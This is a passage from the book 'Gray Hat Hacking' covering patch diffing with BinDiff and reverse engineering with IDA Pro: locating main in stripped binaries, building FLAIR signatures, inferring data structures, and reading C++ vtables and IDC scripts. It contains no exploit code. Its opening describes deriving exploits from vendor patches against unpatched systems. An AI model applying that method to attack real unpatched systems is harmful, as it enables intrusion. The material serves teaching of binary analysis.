change to determine if the modification addresses a vulnerable condition. By studying
any safety checks implemented in the patch, it is possible to understand what types of
malformed input might lead to exploits in the unpatched program. This can lead to the
rapid development of exploits against unpatched systems. It is not uncommon to see
exploits developed within 24 hours of the release of a vendor patch. Searching for vulnerabilities
that have already been patched may not seem like the optimal way to spend
your valuable research time, so what is the point of difference analysis? The first reason
is simply to be able to develop proof-of-concept exploits for use in pen-testing against
unpatched clients. The second reason is to discover use patterns in vulnerable software
in order to locate identical patterns that a vendor may have forgotten to patch. In this
second case, you are leveraging the fact that the vendor has pointed out what they were
doing wrong, and all that is left is for you to determine is whether they have found and
fixed all instances of their wrongful behavior.
BinDiff from SABRE Security is a tool that aims to speed up the process of locating
and understanding changes introduced in patched binary files. Rather than scanning
individual binaries for potential vulnerabilities, BinDiff, as its name implies, displays
the differences between two versions of the same binary. You may think to yourself, “so
what?” Simple tools such as diff or cmp can display the differences between two files as
well. What makes those tools less than useful for comparing two compiled binaries is
that diff is primarily useful for comparing text files, and cmp can provide no contextual
information surrounding any differences. BinDiff, on the other hand, focuses less on
individual byte changes and more on structural or behavioral changes between successive
versions of the same program. BinDiff combines disassembly with graph comparison
algorithms to compare the control flow graphs of successive versions of functions
and highlights the newly introduced code in a display format similar to that of BinNavi.
References
Chevarista www.phrack.org/issues.html?issue=64&id=8
BugScam http://sourceforge.net/projects/bugscam
ERESI http://eresi.asgardlabs.org/
BinNavi http://sabre-security.com/
Chapter 12: Passive Analysis
307
PART IV
This page intentionally left blank
CHAPTER13 Advanced Static Analysis
with IDA Pro
In this chapter you will be introduced to additional features of IDA Pro that will help
you analyze binary code more efficiently and with greater confidence.
• What makes IDA so good?
• Binary analysis challenges
• Dealing with stripped binaries
• Dealing with statically linked binaries
• Understanding the memory layout of structures and classes
• Basic structure of compiled C++ code
• The IDC scripting language
• Introduction to IDA plug-ins
• Introduction to IDA loader and processor modules
Out of the box, IDA Pro is already one of the most powerful binary analysis tools available.
The range of processors and binary file formats that IDA can process is more than
many users will ever need. Likewise, the disassembly view provides all of the capability
that the majority of users will ever want. Occasionally, however, a binary will be sufficiently
sophisticated or complex that you will need to take advantage of IDA’s advanced
features in order to fully comprehend what the binary does. In other cases, you may find
that IDA does a large percentage of what you wish to do, and you would like to pick up
from there with additional automated processing. In this chapter, we examine some of
the challenges faced in binary analysis and how IDA may be used to overcome them.
Static Analysis Challenges
For any nontrivial binary, generally several challenges must be overcome to make analysis
of that binary less difficult. Examples of challenges you might encounter include
• Binaries that have been stripped of some or all of their symbol information
• Binaries that have been linked with static libraries
• Binaries that make use of complex, user-defined data structures
• Compiled C++ programs that make use of polymorphism
309
Gray Hat Hacking: The Ethical Hacker’s Handbook
310
• Binaries that have been obfuscated in some manner to hinder analysis
• Binaries that use instruction sets with which IDA is not familiar
• Binaries that use file formats with which IDA is not familiar
IDA is equipped to deal with all of these challenges to varying degrees, though its documentation
may not indicate that. One of the first things you need to learn to accept as an
IDA user is that there is no user’s manual and the help files are pretty terse. Familiarize
yourself with the available online IDA resources as, aside from your own hunting
around and poking at IDA, they will be your primary means of answering questions.
Some sites that have strong communities of IDA users include openrce.org and the IDA
support boards at DataRescue.
Stripped Binaries
The process of building software generally consists of several phases. In a typical C/C++
environment, you will encounter at a minimum the preprocessor, compilation, and
linking phases before an executable can be produced. For follow-on phases to correctly
combine the results of previous phases, intermediate files often contain information
specific to the next build phase. For example, the compiler embeds into object files a lot
of information that is specifically designed to assist the linker in doing its job of combining
those objects files into a single executable or library. Among other things, this
information includes the names of all of the functions and global variables within the
object file. Once the linker has done its job, however, this information is no longer necessary.
Quite frequently, all of this information is carried forward by the linker and
remains present in the final executable file where it can be examined by tools such as
IDA Pro to learn what all of the functions within a program were originally named. If we
assume, which can be dangerous, that programmers tend to name functions and variables
according to their purpose, then we can learn a tremendous amount of information
simply by having these symbol names available to us. The process of “stripping” a
binary involves removing all symbol information that is no longer required once the
binary has been built. Stripping is generally performed by using the command-line strip
utility and, as a result of removing extraneous information, has the side effect of yielding
a smaller binary. From a reverse-engineering perspective, however, stripping makes a
binary slightly more difficult to analyze as a result of the loss of all of the symbols. In
this regard, stripping a binary can be seen as a primitive form of obfuscation. The most
immediate impact of dealing with a stripped binary in IDA is that IDA will be unable to
locate the main function and will instead initially position the disassembly view at the
program’s true entry point, generally named _start.
NOTE Contrary to popular belief, main is not the first thing executed in a
compiled C or C++ program. A significant amount of initialization must take
place before control can be transferred to main. Some of the startup tasks
include initialization of the C libraries, initialization of global objects, and
creation of the argv and envp arguments expected by main.
Chapter 13: Advanced Static Analysis with IDA Pro
311
PART IV
You will seldom desire to reverse-engineer all of the startup code added by the compiler,
so locating main is a handy thing to be able to do. Fortunately, each compiler
tends to have its own style of initialization code, so with practice you will be able to recognize
the compiler that was used based simply on the startup sequence. Since the last
thing that the startup sequence does is transfer control to main, you should be able to
locate main easily regardless of whether a binary has been stripped. Listing 13-1 shows
the _start function for a gcc compiled binary that has not been stripped.
Listing 13-1
_start proc near
xor ebp, ebp
pop esi
mov ecx, esp
and esp, 0FFFFFFF0h
push eax
push esp
push edx
push offset __libc_csu_fini
push offset __libc_csu_init
push ecx
push esi
push offset main
call ___libc_start_main
hlt
_start endp
Notice that main is not called directly; rather it is passed as a parameter to the library
function __libc_start_main. The __libc_start_main function takes care of libc initialization,
pushing the proper arguments to main, and finally transferring control to main.
Note that main is the last parameter pushed before the call to __libc_start_main. Listing
13-2 shows the _start function from the same binary after it has been stripped.
Listing 13-2
start proc near
xor ebp, ebp
pop esi
mov ecx, esp
and esp, 0FFFFFFF0h
push eax
push esp
push edx
push offset sub_804888C
push offset sub_8048894
push ecx
push esi
push offset loc_8048654
call ___libc_start_main
hlt
start endp
In this second case, we can see that IDA no longer understands the name main.We also
notice that two other function names have been lost as a result of the stripping operation,
while one function has managed to retain its name. It is important to note that the
behavior of _start has not been changed in anyway by the strip operation. As a result,we
can apply what we learned from Listing 13-1, that main is the last argument pushed to
__libc_start_main, and deduce that loc_8046854 must be the start address of main; we
are free to rename loc_8046854 to main as an early step in our reversing process.
One question we need to understand the answer to is why __libc_start_main has
managed to retain its name while all of the other functions we saw in Listing 13-1 lost
theirs. The answer lies in the fact that the binary we are looking at was dynamically
linked (the file command would tell us so) and __libc_start_main is being imported
from libc.so, the shared C library. The stripping process has no effect on imported or
exported function and symbol names. This is because the runtime dynamic linker must
be able to resolve these names across the various shared components required by the
program. We will see in the next section that we are not always so lucky when we
encounter statically linked binaries.
Statically Linked Programs and FLAIR
When compiling programs that make use of library functions, the linker must be told
whether to use shared libraries such as .dll or .so files, or static libraries such as .a files.
Programs that use shared libraries are said to be dynamically linked, while programs that
use static libraries are said to be statically linked. Each form of linking has its own advantages
and disadvantages. Dynamic linking results in smaller executables and easier
upgrading of library components at the expense of some extra overhead when launching
the binary, and the chance that the binary will not run if any required libraries are
missing. To learn what dynamic libraries an executable depends on, you can use the
dumpbin utility on Windows, ldd on Linux, and otool on Mac OS X. Each will list the
names of the shared libraries that the loader must find in order to execute a given
dynamically linked program. Static linking results in much larger binaries because
library code is merged with program code to create a single executable file that has no
external dependencies, making the binary easier to distribute. As an example, consider a
program that makes use of the openssl cryptographic libraries. If this program is built to
use shared libraries, then each computer on which the program is installed must contain
a copy of the openssl libraries. The program would fail to execute on any computer that
does not have openssl installed. Statically linking that same program eliminates the
requirement to have openssl present on computers that will be used to run the program,
making distribution of the program somewhat easier.
From a reverse-engineering point of view, dynamically linked binaries are somewhat
easier to analyze for several reasons. First, dynamically linked binaries contain little to
no library code, which means that the code that you get to see in IDA is just the code that
is specific to the application, making it both smaller and easier to focus on applicationspecific
code rather than library code. The last thing you want to do is spend your time
reversing library code that is generally accepted to be fairly secure. Second, when a
dynamically linked binary is stripped, it is not possible to strip the names of library
Gray Hat Hacking: The Ethical Hacker’s Handbook
312
Chapter 13: Advanced Static Analysis with IDA Pro
313
PART IV
functions called by the binary, which means the disassembly will continue to contain
useful function names in many cases. Statically linked binaries present more of a challenge
because they contain far more code to disassemble, most of which belongs to
libraries. However, as long as the statically linked program has not been stripped, you
will continue to see all of the same names that you would see in a dynamically linked
version of the same program. A stripped, statically linked binary presents the largest
challenge for reverse engineering. When the strip utility removes symbol information
from a statically linked program, it removes not only the function and global variable
names associated with the program, but it also removes the function and global variable
names associated with any libraries that were linked in as well. As a result it is extremely
difficult to distinguish program code from library code in such a binary. Further it is difficult
to determine exactly how many libraries may have been linked into the program.
IDA has facilities (not well documented) for dealing with exactly this situation.
Listing 13-3 shows what our _start function ends up looking like in a statically
linked, stripped binary.
Listing 13-3
start proc near
xor ebp, ebp
pop esi
mov ecx, esp
and esp, 0FFFFFFF0h
push eax
push esp
push edx
push offset sub_8048AD4
push offset sub_8048B10
push ecx
push esi
push offset sub_8048208
call sub_8048440
start endp
At this point we have lost the names of every function in the binary and we need some
method for locating the main function so that we can begin analyzing the program in
earnest. Based on what we saw in Listings 13-1 and 13-2, we can proceed as follows:
• Find the last function called from _start; this should be __libc_start_main.
• Locate the first argument to __libc_start_main; this will be the topmost item
on the stack, usually the last item pushed prior to the function call. In this case,
we deduce that main must be sub_8048208. We are now prepared to start
analyzing the program beginning with main.
Locating main is only a small victory, however. By comparing Listing 13-4 from the
unstripped version of the binary with Listing 13-5 from the stripped version, we can see
that we have completely lost the ability to distinguish the boundaries between user code
and library code.
Gray Hat Hacking: The Ethical Hacker’s Handbook
314
Listing 13-4
mov eax, stderr
mov [esp+250h+var_244], eax
mov [esp+250h+var_248], 14h
mov [esp+250h+var_24C], 1
mov [esp+250h+var_250], offset aUsageFetchHost ; "usage: fetch
call fwrite
mov [esp+250h+var_250], 1
call exit
; ------------------------------------------------------------
loc_804825F: ; CODE XREF: main+24^j
mov edx, [ebp-22Ch]
mov eax, [edx+4]
add eax, 4
mov eax, [eax]
mov [esp+250h+var_250], eax
call gethostbyname
mov [ebp-10h], eax
Listing 13-5
mov eax, off_80BEBE4
mov [esp+250h+var_244], eax
mov [esp+250h+var_248], 14h
mov [esp+250h+var_24C], 1
mov [esp+250h+var_250], offset aUsageFetchHost ; "usage: fetch
call loc_8048F7C
mov [esp+250h+var_250], 1
call sub_8048BB0
; ------------------------------------------------------------
loc_804825F: ; CODE XREF: sub_8048208+24^j
mov edx, [ebp-22Ch]
mov eax, [edx+4]
add eax, 4
mov eax, [eax]
mov [esp+250h+var_250], eax
call loc_8052820
mov [ebp-10h], eax
In Listing 13-5, we have lost the names of stderr, fwrite, exit, and gethostbyname, and
each is indistinguishable from any other user space function or global variable. The danger
we face is that being presented with the binary from Listing 13-5, we might attempt
to reverse-engineer the function at loc_8048F7C. Having done so, we would be disappointed
to learn that we have done nothing more than reverse a piece of the C standard
library. Clearly, this is not a desirable situation for us. Fortunately, IDA possesses the
ability to help out in these circumstances.
Fast Library Identification and Recognition Technology (FLIRT) is the name that IDA gives
to its ability to automatically recognize functions based on pattern/signature matching.
IDA uses FLIRT to match code sequences against many signatures for widely used libraries.
IDA’s initial use of FLIRT against any binary is to attempt to determine the compiler
that was used to generate the binary. This is accomplished by matching entry point
sequences (such as those we saw in Listings 13-1 through 13-3) against stored signatures
for various compilers. Once the compiler has been identified, IDA attempts to match
against additional signatures more relevant to the identified compiler. In cases where
IDA does not pick up on the exact compiler that was used to create the binary, you can
force IDA to apply any additional signatures from IDA’s list of available signature files.
Signature application takes place via the File | Load File | FLIRT Signature File menu
option, which brings up the dialog box shown in Figure 13-1.
The dialog box is populated based on the contents of IDA’s sig subdirectory. Selecting
one of the available signature sets causes IDA to scan the current binary for possible
matches. For each match that is found, IDA renames the matching code in accordance
with the signature. When the signature files are correct for the current binary, this operation
has the effect of unstripping the binary. It is important to understand that IDA does
not come complete with signatures for every static library in existence. Consider the
number of different libraries shipped with any Linux distribution and you can appreciate
the magnitude of this problem. To address this limitation, DataRescue ships a tool
set called Fast Library Acquisition for Identification and Recognition (FLAIR). FLAIR consists
of several command-line utilities used to parse static libraries and generate IDA-compatible
signature files.
Generating IDA Sig Files
Installation of the FLAIR tools is as simple as unzipping the FLAIR distribution (currently
flair51.zip) into aworking directory. Beware that FLAIR distributions are generally
not backward compatible with older versions of IDA, so be sure to obtain the appropriate
version of FLAIR for your version of IDA. After you have extracted the tools, you will
Chapter 13: Advanced Static Analysis with IDA Pro
315
PART IV
Figure 13-1 IDA library signature selection dialog
Gray Hat Hacking: The Ethical Hacker’s Handbook
316
find the entire body of existing FLAIR documentation in the three files named pat.txt,
readme.txt, and sigmake.txt. You are encouraged to read through these files for more
detailed information on creating your own signature files.
The first step in creating signatures for a new library involves the extraction of patterns
for each function in the library. FLAIR comes with pattern-generating parsers for
several common static library file formats. All FLAIR tools are located in FLAIR’s bin subdirectory.
The pattern generators are named pXXX, where XXX represents various library
file formats. In the following example we will generate a sig file for the statically linked
version of the standard C library (libc.a) that ships with FreeBSD 6.2. After moving
libc.a onto our development system, the following command is used to generate a pattern
file:
# ./pelf libc.a libc_FreeBSD62.pat
libc_FreeBSD62.a: skipped 0, total 988
We choose the pelf tool because FreeBSD uses ELF format binaries. In this case, we are
working in FLAIR’s bin directory. If you wish to work in another directory, the usual
PATH issues apply for locating the pelf program. FLAIR pattern files are ASCII text files
containing patterns for each exported function within the library being parsed. Patterns
are generated from the first 32 bytes of a function, from some intermediate bytes of the
function for which a CRC16 value is computed, and from the 32 bytes following the
bytes used to compute the cyclic redundancy check (CRC). Pattern formats are described
in more detail in the pat.txt file included with FLAIR. The second step in creating a sig
file is to use the sigmake tool to create a binary signature file from a generated pattern
file. The following command attempts to generate a sig file from the previously generated
pattern file:
# ../sigmake.exe -n"FreeBSD 6.2 standard C library" \
> libc_FreeBSD62.pat libc_FreeBSD62.sig
See the documentation to learn how to resolve collisitions.
: modules/leaves: 13443664/988, COLLISIONS: 924
The –n option can be used to specify the “Library name” of the sig file as displayed in
the sig file selection dialog box (see Figure 13-1). The default name assigned by sigmake
is “Unnamed Sample Library.” The last two arguments for sigmake represent the input
pattern file and the output sig file respectively. In this example we seem to have a problem;
sigmake is reporting some collisions. In a nutshell, collisions occur when two functions
reduce to the same signature. If any collisions are found, sigmake will refuse to
generate a sig file and instead generates an exclusions (.exc) file. The first few lines of this
particular exclusions file are shown here:
;--------- (delete these lines to allow sigmake to read this file)
; add '+' at the start of a line to select a module
; add '-' if you are not sure about the selection
; do nothing if you want to exclude all modules
___ntohs 00 0000 FB744240486C4C3................................................
___htons 00 0000 FB744240486C4C3................................................
In this example, we see that the functions ntohs and htons have the same signature,
which is not surprising considering that they do the same thing on an x86 architecture,
namely swap the bytes in a two-byte short value. The exclusions file must be edited to
instruct sigmake how to resolve each collision. As shown earlier, basic instructions for
this can be found in the generated .exc file. At a minimum, the comment lines (those
beginning with a semicolon) must be removed. You must then choose which, if any, of
the colliding functions you wish to keep. In this example, if we choose to keep htons, we
must prefix the htons line with a “+” character telling sigmake to treat any function with
the same signature as if it were htons rather than ntohs. More detailed instructions on
how to resolve collisions can be found in FLAIR’s sigmake.txt file. Once you have edited
the exclusions file, simply rerun sigmake with the same options. A successful run will
result in no error or warning messages and the creation of the requested sig file.
Installing the newly created signature file is simply a matter of copying it to the sig subdirectory
under your main IDA program directory. The installed signatures will now be
available for use as shown in Figure 13-2.
Applying the new signatures to the following code:
.text:0804872C push ebp
.text:0804872D mov ebp, esp
.text:0804872F sub esp, 18h
.text:08048732 call sub_80593B0
.text:08048737 mov [ebp+var_4], eax
.text:0804873A call sub_805939C
.text:0804873F mov [ebp+var_8], eax
.text:08048742 sub esp, 8
.text:08048745 mov eax, [ebp+arg_0]
.text:08048748 push dword ptr [eax+0Ch]
Chapter 13: Advanced Static Analysis with IDA Pro
317
PART IV
Figure 13-2 Selecting appropriate signatures
.text:0804874B mov eax, [ebp+arg_0]
.text:0804874E push dword ptr [eax]
.text:08048750 call sub_8057850
.text:08048755 add esp, 10h
yields the following improved disassembly in which we are far less likely to waste time
analyzing any of the three functions that are called.
.text:0804872C push ebp
.text:0804872D mov ebp, esp
.text:0804872F sub esp, 18h
.text:08048732 call ___sys_getuid
.text:08048737 mov [ebp+var_4], eax
.text:0804873A call ___sys_getgid
.text:0804873F mov [ebp+var_8], eax
.text:08048742 sub esp, 8
.text:08048745 mov eax, [ebp+arg_0]
.text:08048748 push dword ptr [eax+0Ch]
.text:0804874B mov eax, [ebp+arg_0]
.text:0804874E push dword ptr [eax]
.text:08048750 call _initgroups
.text:08048755 add esp, 10h
We have not covered how to identify exactly which static library files to use when generating
your IDA sig files. It is safe to assume that statically linked C programs are linked
against the static C library. To generate accurate signatures, it is important to track down
a version of the library that closely matches the one with which the binary was linked.
Here, some file and strings analysis can assist in narrowing the field of operating systems
that the binary may have been compiled on. The file utility can distinguish among various
platforms such as Linux, FreeBSD, or OS X, and the strings utility can be used to
search for version strings that may point to the compiler or libc version that was used.
Armed with that information, you can attempt to locate the appropriate libraries from a
matching system. If the binary was linked with more than one static library, additional
strings analysis may be required to identify each additional library. Useful things to
look for in strings output include copyright notices, version strings, usage instructions,
or other unique messages that could be thrown into a search engine in an attempt to
identify each additional library. By identifying as many libraries as possible and applying
their signatures, you greatly reduce the amount of code that you need to spend time
analyzing and get to focus more attention on application-specific code.
Data Structure Analysis
One consequence of compilation being a lossy operation is that we lose access to data
declarations and structure definitions, which makes it far more difficult to understand
the memory layout in disassembled code. As mentioned in Chapter 12, IDA provides
the capability to define the layout of data structures and then to apply those structure
definitions to regions of memory. Once a structure template has been applied to a
region of memory, IDA can utilize structure field names in place of integer offsets within
the disassembly, making the disassembly far more readable. There are two important
steps in determining the layout of data structures in compiled code. The first step is to
Gray Hat Hacking: The Ethical Hacker’s Handbook
318
Chapter 13: Advanced Static Analysis with IDA Pro
319
PART IV
determine the size of the data structure. The second step is to determine how the structure
is subdivided into fields and what type is associated with each field. The program in
Listing 13-6 and its corresponding compiled version in Listing 13-7 will be used to illustrate
several points about disassembling structures.
Listing 13-6
1: #include
2: #include
3: #include
4: typedef struct GrayHat_t {
5: char buf[80];
6: int val;
7: double squareRoot;
8: } GrayHat;
9: int main(int argc, char **argv) {
10: GrayHat gh;
11: if (argc == 4) {
12: GrayHat *g = (GrayHat*)malloc(sizeof(GrayHat));
13: strncpy(g->buf, argv[1], 80);
14: g->val = atoi(argv[2]);
15: g->squareRoot = sqrt(atof(argv[3]));
16: strncpy(gh.buf, argv[0], 80);
17: gh.val = 0xdeadbeef;
18: }
19: return 0;
20: }
Listing 13-7
1: ; int __cdecl main(int argc,const char **argv,const char *envp)
2: _main proc near
3: var_70 = qword ptr -112
4: dest = byte ptr -96
5: var_10 = dword ptr -16
6: argc = dword ptr 8
7: argv = dword ptr 12
8: envp = dword ptr 16
9: push ebp
10: mov ebp, esp
11: add esp, 0FFFFFFA0h
12: push ebx
13: push esi
14: mov ebx, [ebp+argv]
15: cmp [ebp+argc], 4 ; argc != 4
16: jnz short loc_4011B6
17: push 96 ; struct size
18: call _malloc
19: pop ecx
20: mov esi, eax ; esi points to struct
21: push 80 ; maxlen
22: push dword ptr [ebx+4] ; argv[1]
23: push esi ; start of struct
24: call _strncpy
25: add esp, 0Ch
26: push dword ptr [ebx+8] ; argv[2]
27: call _atol
28: pop ecx
29: mov [esi+80], eax ; 80 bytes into struct
30: push dword ptr [ebx+12] ; argv[3]
31: call _atof
32: pop ecx
33: add esp, 0FFFFFFF8h
34: fstp [esp+70h+var_70]
35: call _sqrt
36: add esp, 8
37: fstp qword ptr [esi+88] ; 88 bytes into struct
38: push 80 ; maxlen
39: push dword ptr [ebx] ; argv[0]
40: lea eax, [ebp-96]
41: push eax ; dest
42: call _strncpy
43: add esp, 0Ch
44: mov [ebp-16], 0DEADBEEFh
45: loc_4011B6:
46: xor eax, eax
47: pop esi
48: pop ebx
49: mov esp, ebp
50: pop ebp
51: retn
52: _main endp
There are two methods for determining the size of a structure. The first and easiest method
is to find locations at which a structure is dynamically allocated using malloc or new.
Lines 17 and 18 in Listing 13-7 show a call to malloc 96 bytes of memory. Malloced
blocks of memory generally represent either structures or arrays. In this case, we learn that
this program manipulates a structure whose size is 96 bytes. The resulting pointer is transferred
into the esi register and used to access the fields in the structure for the remainder of
the function. References to this structure take place at lines 23, 29, and 37.
The second method of determining the size of a structure is to observe the offsets
used in every reference to the structure and to compute the maximum size required to
house the data that is referenced. In this case, line 23 references the 80 bytes at the beginning
of the structure (based on the maxlen argument pushed at line 21), line 29 references
4 bytes (the size of eax) starting at offset 80 into the structure ([esi + 80]), and line
37 references 8 bytes (a quad word/qword) starting at offset 88 ([esi + 88]) into the
structure. Based on these references, we can deduce that the structure is 88 (the maximum
offset we observe) plus 8 (the size of data accessed at that offset), or 96 bytes long.
Thus we have derived the size of the structure by two different methods. The second
method is useful in cases where we can’t directly observe the allocation of the structure,
perhaps because it takes place within library code.
To understand the layout of the bytes within a structure, we must determine the types
of data that are used at each observable offset within the structure. In our example, the
access at line 23 uses the beginning of the structure as the destination of a string copy
Gray Hat Hacking: The Ethical Hacker’s Handbook
320
operation, limited in size to 80 bytes.We can conclude therefore that the first 80 bytes of
the structure are an array of characters. At line 29, the 4 bytes at offset 80 in the structure
are assigned the result of the function atol, which converts an ascii string to a long value.
Here we can conclude that the second field in the structure is a 4-byte long. Finally, at
line 37, the 8 bytes at offset 88 into the structure are assigned the result of the function
atof, which converts an ascii string to a floating-point double value. You may have
noticed that the bytes at offsets 84–87 of the structure appear to be unused. There are
two possible explanations for this. The first is that there is a structure field between the
long and the double that is simply not referenced by the function. The second possibility
is that the compiler has inserted some padding bytes to achieve some desired field
alignment. Based on the actual definition of the structure in Listing 13-6, we conclude
that padding is the culprit in this particular case. If we wanted to see meaningful field
names associated with each structure access,we could define a structure in the IDA structure
window as described in Chapter 12. IDA offers an alternative method for defining
structures that you may find far easier to use than its structure editing facilities. IDA can
parse C header files via the File | Load File menu option. If you have access to the source
code or prefer to create a C-style struct definition using a text editor, IDA will parse the
header file and automatically create structures for each struct definition that it encounters
in the header file. The only restriction you must be aware of is that IDA only recognizes
standard C data types. For any nonstandard types, uint32_t, for example, the
header file must contain an appropriate typedef, or you must edit the header file to convert
all nonstandard types to standard types.
Access to stack or globally allocated structures looks quite different than access to
dynamically allocated structures. Listing 13-6 shows that main contains a local, stack allocated
structure declared at line 10. Lines 16 and 17 of main reference fields in this local
structure. These correspond to lines 40 and 44 in the assembly Listing 13-7. While we can
see that line 44 references memory that is 80 bytes ([ebp-96+80] == [ebp-16]) after the
reference at line 40, we don’t get a sense that the two references belong to the same structure.
This is because the compiler can compute the address of each field (as an absolute
address in a global variable, or a relative address within a stack frame) at compile time,
whereas access to fields in dynamically allocated structures must always be computed at
runtime because the base address of the structure is not known at compile time.
Using IDA Structures to View Program Headers
In addition to enabling you to declare your own data structures, IDA contains a large
number of common data structure templates for various build environments, including
standard C library structures and Windows API structures. An interesting example use of
these predefined structures is to use them to examine the program file headers which, by
default, are not loaded into the analysis database. To examine file headers, you must perform
a manual load when initially opening a file for analysis. Manual loads are selected
via a checkbox on the initial load dialog box as shown in Figure 13-3.
Manual loading forces IDA to ask you whether you wish to load each section of the
binary into IDA’s database. One of the sections that IDA will ask about is the header section,
which will allow you to see all the fields of the program headers including structures
Chapter 13: Advanced Static Analysis with IDA Pro
321
PART IV
such as the MSDOS and NT file headers. Another section that gets loaded only when a
manual load is performed is the resource section that is used on the Windows platform to
store dialog box and menu templates, string tables, icons, and the file properties. You can
view the fields of the MSDOS header by scrolling to the beginning of a manually loaded
Windows PE file and placing the cursor on the first address in the database, which should
contain the ‘M’ value of the MSDOS ‘MZ’ signature. No layout information will be displayed
until you add the IMAGE_DOS_HEADER to your structures window. This is
accomplished by switching to the Structures tab, pressing INSERT, entering IMAGE_DOS_
HEADER as the Structure Name, and clicking OK as shown in Figure 13-4.
This will pull IDA’s definition of the IMAGE_DOS_HEADER from its type library into
your local structures window and make it available to you. Finally, you need to return to the
disassembly window, position the cursor on the first byte of the DOS header, and use the
ALT-Q hotkey sequence to apply the IMAGE_DOS_HEADER template. The structure may
initially appear in its collapsed form, but you can view all of the struct fields by expanding
the struct with the numeric keypad + key. This results in the display shown next:
HEADER:00400000 __ImageBase dw 5A4Dh ; e_magic
HEADER:00400000 dw 50h ; e_cblp
HEADER:00400000 dw 2 ; e_cp
HEADER:00400000 dw 0 ; e_crlc
HEADER:00400000 dw 4 ; e_cparhdr
HEADER:00400000 dw 0Fh ; e_minalloc
Gray Hat Hacking: The Ethical Hacker’s Handbook
322
Figure 13-3 Forcing a manual load with IDA
Chapter 13: Advanced Static Analysis with IDA Pro
323
PART IV
HEADER:00400000 dw 0FFFFh ; e_maxalloc
HEADER:00400000 dw 0 ; e_ss
HEADER:00400000 dw 0B8h ; e_sp
HEADER:00400000 dw 0 ; e_csum
HEADER:00400000 dw 0 ; e_ip
HEADER:00400000 dw 0 ; e_cs
HEADER:00400000 dw 40h ; e_lfarlc
HEADER:00400000 dw 1Ah ; e_ovno
HEADER:00400000 dw 4 dup(0) ; e_res
HEADER:00400000 dw 0 ; e_oemid
HEADER:00400000 dw 0 ; e_oeminfo
HEADER:00400000 dw 0Ah dup(0) ; e_res2
HEADER:00400000 dd 200h ; e_lfanew
A little research on the contents of the DOS header will tell you that the e_lfanew field
holds the offset to the PE header struct. In this case, we can go to address 00400000 +
200h (00400200) and expect to find the PE header. The PE header fields can be viewed
by repeating the process just described and using IMAGE_NT_HEADERS as the structure
you wish to select and apply.
Quirks of Compiled C++ Code
C++ is a somewhat more complex language than C, offering member functions and
polymorphism, among other things. These two features require implementation details
that make compiled C++ code look rather different than compiled C code when they are
used. First, all nonstatic member functions require a this pointer; and second, polymorphism
is implemented through the use of vtables.
NOTE In C++ a this pointer is available in all nonstatic member functions.
This points to the object for which the member function was called and
allows a single function to operate on many different objects merely by
providing different values for this each time the function is called.
Figure 13-4 Importing the IMAGE_DOS_HEADER structure
Gray Hat Hacking: The Ethical Hacker’s Handbook
324
The means by which this pointers are passed to member functions vary from compiler
to compiler. Microsoft compilers take the address of the calling object and place it in the
ecx register prior to calling a member function. Microsoft refers to this calling convention
as a this call. Other compilers, such as Borland and g++, push the address of the calling
object as the first (leftmost) parameter to the member function, effectively making
this an implicit first parameter for all nonstatic member functions. C++ programs compiled
with Microsoft compilers are very recognizable as a result of their use of this call.
Listing 13-8 shows a simple example.
Listing 13-8
demo proc near
this = dword ptr -4
val = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov [ebp+this], ecx ; save this into a local variable
mov eax, [ebp+this]
mov ecx, [ebp+val]
mov [eax], ecx
mov edx, [ebp+this]
mov eax, [edx]
mov esp, ebp
pop ebp
retn 4
demo endp
; int __cdecl main(int argc,const char **argv,const char *envp)
_main proc near
x = dword ptr -8
e = byte ptr -4
argc = dword ptr 8
argv = dword ptr 0Ch
envp = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 8
push 3
lea ecx, [ebp+e] ; address of e loaded into ecx
call demo ; demo must be a member function
mov [ebp+x], eax
mov esp, ebp
pop ebp
retn
_main endp
Because Borland and g++ pass this as a regular stack parameter, their code tends to look
more like traditional compiled C code and does not immediately stand out as compiled
C++.
C++ Vtables
Virtual tables (vtables) are the mechanism underlying virtual functions and polymorphism
in C++. For each class that contains virtual member functions, the C++ compiler
generates a table of pointers called a vtable. A vtable contains an entry for each virtual
function in a class, and the compiler fills each entry with a pointer to the virtual function’s
implementation. Subclasses that override any virtual functions each receive their
own vtable. The compiler copies the superclass’s vtable, replacing the pointers of any
functions that have been overridden with pointers to their corresponding subclass
implementations. The following is an example of superclass and subclass vtables:
SuperVtable dd offset func1 ; DATA XREF: Super::Super(void)
dd offset func2
dd offset func3
dd offset func4
dd offset func5
dd offset func6
SubVtable dd offset func1 ; DATA XREF: Sub::Sub(void)
dd offset func2
dd offset sub_4010A8
dd offset sub_4010C4
dd offset func5
dd offset func6
As can be seen, the subclass overrides func3 and func4, but inherits the remaining virtual
functions from its superclass. The following features of vtables make them stand
out in disassembly listings:
• Vtables are usually found in the read-only data section of a binary.
• Vtables are referenced directly only from object constructors and destructors.
• By examining similarities among vtables, it is possible to understand
inheritance relationships among classes in a C++ program.
• When a class contains virtual functions, all instances of that class will contain a
pointer to the vtable as the first field within the object. This pointer is
initialized in the class constructor.
• Calling a virtual function is a three-step process. First, the vtable pointer must be
read from the object. Second, the appropriate virtual function pointer must be read
from the vtable. Finally, the virtual function can be called via the retrieved pointer.
Reference
FLIRT Reference www.datarescue.com/idabase/flirt.htm
Extending IDA
Although IDA Pro is an extremely powerful disassembler on its own, it is rarely possible
for a piece of software to meet every need of its users. To provide as much flexibility as
possible to its users, IDA was designed with extensibility in mind. These features include
Chapter 13: Advanced Static Analysis with IDA Pro
325
PART IV
a custom scripting language for automating simple tasks, and a plug-in architecture that
allows for more complex, compiled extensions.
Scripting with IDC
IDA’s scripting language is named IDC. IDC is a very C-like language that is interpreted
rather than compiled. Like many scripting languages, IDC is dynamically typed, and can
be run in something close to an interactive mode, or as complete stand-alone scripts
contained in .idc files. IDA does provide some documentation on IDC in the form of
help files that describe the basic syntax of the language and the built-in API functions
available to the IDC programmer. Like other IDA documentation, that available for IDC
follows a rather minimalist approach consisting primarily of comments from various
IDC header files. Learning the IDC API generally requires browsing the IDC documentation
until you discover a function that looks like it might do what you want, then playing
around with that function until you understand how it works. The following points
offer a quick rundown of the IDC language:
• IDC understands C++ style single- or multiline comments.
• No explicit data types are in IDC.
• No global variables are allowed in IDC script files.
• If you require variables in your IDC scripts, they must be declared as the first
lines of your script or the first lines within any function.
• Variable declarations are introduced using the auto keyword:
auto addr, j, k, val;
auto min_ea, max_ea;
• Function declarations are introduced with the static keyword. Functions have no
explicit return type. Function argument declarations do not require the auto
keyword. If you want to return a value from a function, simply return it.
Different control paths can return different data types:
